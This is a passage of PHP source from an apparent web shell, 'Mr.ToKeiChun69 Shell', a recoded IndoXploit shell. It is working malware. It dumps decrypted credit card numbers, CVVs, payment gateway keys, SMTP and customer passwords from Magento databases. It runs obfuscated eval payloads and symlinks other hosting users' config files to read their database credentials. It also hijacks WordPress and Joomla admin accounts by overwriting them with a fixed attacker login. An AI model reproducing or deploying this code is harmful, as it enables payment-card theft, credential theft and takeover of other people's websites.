  744. echo "</table><br>";
  745. //=========================================================================================================
  746. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  747. if(mysql_num_rows($query) != 0){
  748. if (!$query){
  749. echo "<center><b>Gagal</b></center>";
  750. }else{
  751. echo'<br><br>
  752. ====================================================================<br>
  753. [ Authorizenet ] <br>
  754. ====================================================================<br>';
  755. }
  756. echo "
  757. <table border='1' align='center' >
  758. <tr>
  759. <td>no</td>
  760. <td>user</td>
  761. <td>pass</td>
  762. </tr>";
  763. $no = 1;
  764. while($vx = mysql_fetch_array($query)) {
  765. $user = $crypto->decrypt($vx['user']);
  766. $pass = $crypto->decrypt($vx['pass']);
  767.  
  768.  
  769. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  770. $no++;
  771. }
  772. echo "</table><br>";
  773. }
  774. //=========================================================================================================
  775. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  776. if(mysql_num_rows($query_smtp) != 0){
  777. if (!$query_smtp){
  778. echo "<center><b>Gagal</b></center>";
  779. }else{
  780. echo'<br><br>
  781. ====================================================================<br>
  782. [ SMTP ] <br>
  783. ====================================================================<br>';
  784. }
  785. echo "
  786. <table border='1' align='center' >
  787. <tr>
  788. <td>no</td>
  789. <td>host</td>
  790. <td>port</td>
  791. <td>user</td>
  792. <td>pass</td>
  793. </tr>";
  794. $no = 1;
  795. $batas = 0;
  796. while($rows = mysql_fetch_array($query_smtp)) {
  797. $smtphost = $rows[0];
  798. $smtpport = $rows[1];
  799. $smtpuser = $rows[2];
  800. $smtppass = $rows[3];
  801. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  802. $no++;
  803. }
  804. echo "</table><br>";
  805. }
  806. //=========================================================================================================
  807. $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
  808. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  809. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  810. echo'<br><br>
  811. ====================================================================<br>
  812. [ Credit Card ] <br>
  813. ====================================================================<br>';
  814. echo "
  815. <table border='1' align='left' >
  816. <tr>
  817. <td>no</td>
  818. <td>Date</td>
  819. <td>Credit Owner</td>
  820. <td>method</td>
  821. <td>Credit Number</td>
  822. <td>Credit Exp</td>
  823. <td>CVV</td>
  824. <td>Address</td>
  825. </tr>";
  826. $no = 1;
  827. $batas = 0;
  828. while($vx = mysql_fetch_array($query)){
  829. $date = $vx['updated_at'];
  830. $cc_owner = $vx['cc_owner'];
  831. $method = $vx['method'];
  832. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  833. $exp = $vx['exp'];
  834. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  835. $Billing_Address = $vx['Billing Address'];
  836. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  837. $batas = $no++;
  838. }
  839.  
  840. while($vx2 = mysql_fetch_array($query2)){
  841. $batas +=1;
  842. $cc_owner = $vx2['cc_owner'];
  843. $method = $vx2['method'];
  844. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  845. $exp = $vx2['exp'];
  846. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  847. $Billing_Address = $vx2['Billing Address'];
  848. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  849. $batas++;
  850. }
  851.  
  852. echo "</table><br>";
  853. }
  854. //=========================================================================================================
  855. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  856. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  857.  
  858.  
  859. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  860. if (!$query){
  861. echo "<center><b>Gagal</b></center>";
  862. }else{
  863. echo'<br><br>
  864. ====================================================================<br>
  865. [ Customer ] <br>
  866. ====================================================================<br>';
  867. }
  868. echo "
  869. <table border='1' align='center' >
  870. <tr>
  871. <td>no</td>
  872. <td>user</td>
  873. <td>pass</td>
  874. </tr>";
  875. $no = 1;
  876. $batas = 0;
  877. while($vx = mysql_fetch_array($query)) {
  878. $user = $vx['email'];
  879. $pass = $vx['value'];
  880. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  881. $batas = $no++;
  882. }
  883.  
  884. if(mysql_num_rows($query2) != 0 && ($query2)){
  885. while($vx2 = mysql_fetch_array($query2)){
  886. $user = $vx2['customer_email'];
  887. $pass = $crypto->decrypt($vx2['password_hash']);
  888. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  889. $batas +=1;
  890. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  891. $batas++;
  892. }
  893. }
  894. }
  895.  
  896. echo "</table><br>";
  897. }
  898. //=========================================================================================================
  899. }
  900. }
  901. function save($format,$data){
  902. $fp = fopen($format, 'a');
  903. fwrite($fp, $data);
  904. fclose($fp);
  905. }
  906. function cekbase64($string){
  907. $decoded = base64_decode($string, true);
  908. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  909. if(!base64_decode($string, true)) return false;
  910. if(base64_encode($decoded) != $string) return false;
  911. return true;//nilai return 1 jika true
  912. }
  913. //----untuk decode password ---/
  914. class Varien_Crypt_Mcrypt{
  915. /**
  916. * Constuctor
  917. *
  918. * @param array $data
  919. */
  920. public function __construct()
  921. {
  922. }
  923.  
  924. /**
  925. * Initialize mcrypt module
  926. *
  927. * @param string $key cipher private key
  928. * @return Varien_Crypt_Mcrypt
  929. */
  930. public function init($key)
  931. {
  932. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  933. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  934. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  935.  
  936. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  937. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  938. return null;
  939. }
  940.  
  941. mcrypt_generic_init($this->handler, $key, $iv);
  942.  
  943. return $this;
  944. }
  945.  
  946. /**
  947. * Encrypt data
  948. *
  949. * @param string $data source string
  950. * @return string
  951. */
  952. public function encrypt($data)
  953. {
  954. if (!$this->handler) {
  955. //throw new Varien_Exception('Crypt module is not initialized.');
  956. return null;
  957. }
  958. if (strlen($data) == 0) {
  959. return $data;
  960. }
  961. return base64_encode(mcrypt_generic($this->handler, $data));
  962. }
  963.  
  964. /**
  965. * Decrypt data
  966. *
  967. * @param string $data encrypted string
  968. * @return string
  969. */
  970. public function decrypt($data)
  971. {
  972. if (!$this->handler) {
  973. //throw new Varien_Exception('Crypt module is not initialized.');
  974. return null;
  975. }
  976. if (strlen($data) == 0) {
  977. return $data;
  978. }
  979. return mdecrypt_generic($this->handler, base64_decode($data));
  980. }
  981.  
  982.  
  983. /**
  984. * Desctruct cipher module
  985. *
  986. */
  987. public function __destruct()
  988. {
  989. if ($this->handler) {
  990. $this->_reset();
  991. }
  992. }
  993.  
  994. protected function _reset()
  995. {
  996. mcrypt_generic_deinit($this->handler);
  997. mcrypt_module_close($this->handler);
  998. }
  999. }
  1000. }
  1001. elseif($_GET['do'] == 'zip') {
  1002. echo "<center><h1>Zip Menu</h1>";
  1003. function rmdir_recursive($dir) {
  1004. foreach(scandir($dir) as $file) {
  1005. if ('.' === $file || '..' === $file) continue;
  1006. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1007. else unlink("$dir/$file");
  1008. }
  1009. rmdir($dir);
  1010. }
  1011. if($_FILES["zip_file"]["name"]) {
  1012. $filename = $_FILES["zip_file"]["name"];
  1013. $source = $_FILES["zip_file"]["tmp_name"];
  1014. $type = $_FILES["zip_file"]["type"];
  1015. $name = explode(".", $filename);
  1016. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1017. foreach($accepted_types as $mime_type) {
  1018. if($mime_type == $type) {
  1019. $okay = true;
  1020. break;
  1021. }
  1022. }
  1023. $continue = strtolower($name[1]) == 'zip' ? true : false;
  1024. if(!$continue) {
  1025. $message = "Itu Bukan Zip , , GOBLOK COK";
  1026. }
  1027. $path = dirname(__FILE__).'/';
  1028. $filenoext = basename ($filename, '.zip');
  1029. $filenoext = basename ($filenoext, '.ZIP');
  1030. $targetdir = $path . $filenoext;
  1031. $targetzip = $path . $filename;
  1032. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  1033. mkdir($targetdir, 0777);
  1034. if(move_uploaded_file($source, $targetzip)) {
  1035. $zip = new ZipArchive();
  1036. $x = $zip->open($targetzip);
  1037. if ($x === true) {
  1038. $zip->extractTo($targetdir);
  1039. $zip->close();
  1040.  
  1041. unlink($targetzip);
  1042. }
  1043. $message = "<b>Sukses Gan :)</b>";
  1044. } else {
  1045. $message = "<b>Error Gan :(</b>";
  1046. }
  1047. }
  1048. echo '<table style="width:100%" border="1">
  1049. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1050. <label>Zip File : <input type="file" name="zip_file" /></label>
  1051. <input type="submit" name="submit" value="Upload And Unzip" />
  1052. </form>';
  1053. if($message) echo "<p>$message</p>";
  1054. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1055. if($_POST['backup']){
  1056. $save=$_POST['save'];
  1057. function Zip($source, $destination)
  1058. {
  1059. if (extension_loaded('zip') === true)
  1060. {
  1061. if (file_exists($source) === true)
  1062. {
  1063. $zip = new ZipArchive();
  1064.  
  1065. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1066. {
  1067. $source = realpath($source);
  1068.  
  1069. if (is_dir($source) === true)
  1070. {
  1071. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1072.  
  1073. foreach ($files as $file)
  1074. {
  1075. $file = realpath($file);
  1076.  
  1077. if (is_dir($file) === true)
  1078. {
  1079. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1080. }
  1081.  
  1082. else if (is_file($file) === true)
  1083. {
  1084. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1085. }
  1086. }
  1087. }
  1088.  
  1089. else if (is_file($source) === true)
  1090. {
  1091. $zip->addFromString(basename($source), file_get_contents($source));
  1092. }
  1093. }
  1094.  
  1095. return $zip->close();
  1096. }
  1097. }
  1098.  
  1099. return false;
  1100. }
  1101. Zip($_POST['dir'],$save);
  1102. echo "Done , Save To <b>$save</b>";
  1103. }
  1104. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1105. if($_POST['extrak']){
  1106. $save=$_POST['save'];
  1107. $zip = new ZipArchive;
  1108. $res = $zip->open($_POST['dir']);
  1109. if ($res === TRUE) {
  1110. $zip->extractTo($save);
  1111. $zip->close();
  1112. echo 'Succes , Location : <b>'.$save.'</b>';
  1113. } else {
  1114. echo 'Gagal Mas :( Ntahlah !';
  1115. }
  1116. }
  1117. echo '</tr></table>';
  1118. }
  1119. elseif($_GET['do'] == 'shellchk') {
  1120. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1121. } elseif($_GET['do'] == 'loghunter')
  1122. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
  1123. elseif($_GET['do'] == 'metu') {
  1124.  
  1125.  
  1126. echo '<form action="?dir=$dir&do=metu" method="post">';
  1127. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1128. echo 'Byee !';
  1129.  
  1130. }
  1131. elseif($_GET['do'] == 'about') {
  1132.  
  1133. echo '<center>Mr.ToKeiChun69 Shell<hr>IndoXploit Shell Recoded By Mr.ToKeiChun59<br><a href="https://www.facebook.com/tokeichun">Here</a>';
  1134. }
  1135. elseif($_GET['do'] == 'symlink404') {
  1136. echo "<center>
  1137. <form method='post'>
  1138. <br>File Target: <input type='text' name='dir' size='50' value='/home/user/public_html/wp-config.php'>
  1139. <br>Save As: <input type='text' name='jnck' size='50' value='config404.txt'><br><input name='sym404' type='submit' value='Eksekusi Gan'></form><br>";
  1140. @error_reporting(0);
  1141. @ini_set('display_errors', 0);
  1142. if($_POST['sym404']){
  1143. rmdir("sym404");mkdir("sym404", 0777);
  1144. $dir = $_POST['dir'];
  1145. $jnck = $_POST['jnck'];
  1146. system("ln -s ".$dir." sym404/".$jnck);
  1147. symlink($dir,"sym404/".$jnck);
  1148. $inija = fopen("sym404/.htaccess", "w");
  1149. fwrite($inija,"ReadmeName ".$jnck);
  1150. echo'<a href="sym404/">Succes! >:(</a>';
  1151. }
  1152.  
  1153. }
  1154. elseif($_GET['do'] == 'auto_cu_wp') {
  1155. if($_POST['gass']) {
  1156. echo "<center><h1>WordPress Auto Change User 2</h1>
  1157. <form method='post'>
  1158. Link Config: <br>
  1159. <textarea name='link' style='width: 450px; height:250px;'>";
  1160. UrlLoop($_POST['linkconf'],'wordpress');
  1161. echo"</textarea><br>
  1162. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1163. </form></center>";
  1164. } else {
  1165. echo "<center><h1>WordPress Auto Change User 2</h1>
  1166. <form method='post'>
  1167. Link Config: <br>
  1168. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/tkc_symconf/'><br>
  1169. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1170. </form></center>";
  1171. }
  1172. if($_POST['auto_cu_wp']) {
  1173.  
  1174. function anucurl($sites) {
  1175. $ch = curl_init($sites);
  1176. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1177. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1178. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1179. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1180. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1181. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1182. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1183. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1184. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1185. $data = curl_exec($ch);
  1186. curl_close($ch);
  1187. return $data;
  1188. }
  1189. $link = explode("\r\n", $_POST['link']);
  1190. $user = "heninoor27";
  1191. $pass = "heninoor27";
  1192. $passx = md5($pass);
  1193. foreach($link as $dir_config) {
  1194. $config = anucurl($dir_config);
  1195. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1196. $dbuser = ambilkata($config,"DB_USER', '","'");
  1197. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1198. $dbname = ambilkata($config,"DB_NAME', '","'");
  1199. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1200. $prefix = $dbprefix."users";
  1201. $option = $dbprefix."options";
  1202. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1203. $db = mysql_select_db($dbname);
  1204. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1205. $result = mysql_fetch_array($q);
  1206. $id = $result[ID];
  1207. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1208. $result2 = mysql_fetch_array($q2);
  1209. $target = $result2[option_value];
  1210. if($target == '') {
  1211. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1212. } else {
  1213. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1214. }
  1215. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1216. if(!$conn OR !$db OR !$update) {
  1217. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1218. mysql_close($conn);
  1219. } else {
  1220. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1221. echo "[+] username: <font color=lime>$user</font><br>";
  1222. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1223.  
  1224. mysql_close($conn);
  1225. }
  1226. }
  1227. }
  1228.  
  1229. }
  1230. elseif($_GET['do'] == 'auto_cu_joomla') {
  1231. if($_POST['gass']) {
  1232. echo "<center><h1>Joomla Auto Change User 2</h1>
  1233. <form method='post'>
  1234. Link Config: <br>
  1235. <textarea name='link' style='width: 450px; height:250px;'>";
  1236. UrlLoop($_POST['linkconf'],'joomla');
  1237. echo"</textarea><br>
  1238. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1239. </form></center>";
  1240. } else {
  1241. echo "<center><h1>Joomla Auto Change User 2</h1>
  1242. <form method='post'>
  1243. Link Config: <br>
  1244. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/tkc_symconf/'><br>
  1245. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1246. </form></center>";
  1247. }
  1248. if($_POST['auto_cu_joomla']) {
  1249.  
  1250. function anucurl($sites) {
  1251. $ch = curl_init($sites);
  1252. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1253. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1254. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1255. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1256. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1257. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1258. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1259. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1260. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1261. $data = curl_exec($ch);
  1262. curl_close($ch);
  1263. return $data;
  1264. }
  1265. $link = explode("\r\n", $_POST['link']);
  1266. $user = "heninoor27";
  1267. $pass = "heninoor27";
  1268. $passx = md5($pass);
  1269. foreach($link as $dir_config) {
  1270. $config = anucurl($dir_config);
  1271. $dbhost = ambilkata($config,"host = '","'");
  1272. $dbuser = ambilkata($config,"user = '","'");
  1273. $dbpass = ambilkata($config,"password = '","'");
  1274. $dbname = ambilkata($config,"db = '","'");
  1275. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1276. $prefix = $dbprefix."users";
  1277. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1278. $db = mysql_select_db($dbname);
  1279. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1280. $result = mysql_fetch_array($q);
  1281. $id = $result['id'];
  1282. $site = ambilkata($config,"sitename = '","'");
  1283. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1284. echo "Config => ".$dir_config."<br>";
  1285. echo "CMS => Joomla<br>";
  1286. if($site == '') {
  1287. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1288. } else {
  1289. echo "Sitename => $site<br>";
  1290. }
  1291. if(!$update OR !$conn OR !$db) {
  1292. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1293. } else {
  1294. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1295. }
  1296. mysql_close($conn);
  1297. }
  1298. }
  1299. }
  1300. elseif($_GET['do'] == 'symconfig') {
  1301. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1302. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1303. exit;
  1304. }
  1305. else
  1306. {
  1307. if($_POST["m"] && !$_POST["passwd"]==""){
  1308. @mkdir("tkc_symconf", 0777);
  1309. @chdir("tkc_symconf");
  1310. @symlink("/","root");
  1311. $htaccess="Options Indexes FollowSymLinks
  1312. DirectoryIndex tokeichun.html
  1313. AddType text/plain .php
  1314. AddHandler text/plain .php
  1315. Satisfy Any";
  1316. @file_put_contents(".htaccess",$htaccess);
  1317. $etc_passwd=$_POST["passwd"];
  1318. $etc_passwd=explode("\n",$etc_passwd);
  1319. foreach($etc_passwd as $passwd){
  1320. $pawd=explode(":",$passwd);
  1321. $user =$pawd[0];
  1322.  
  1323. @symlink('/','tkc_symconf/root');
  1324. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1325. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1326. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1327. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1328. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1329. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1330. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1331. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1332. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1333. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1334. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1335. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1336. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1337. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1338. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1339. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1340. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1341. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1342. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1344. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1345. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1346. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1347. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1348. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1349. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1350. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
